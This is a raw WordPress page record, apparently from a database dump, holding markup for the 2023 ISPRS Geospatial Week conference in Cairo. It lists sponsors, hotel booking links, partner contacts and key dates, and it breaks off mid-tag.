(5128,1,'2023-08-13 16:29:04','2023-08-13 16:29:04','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 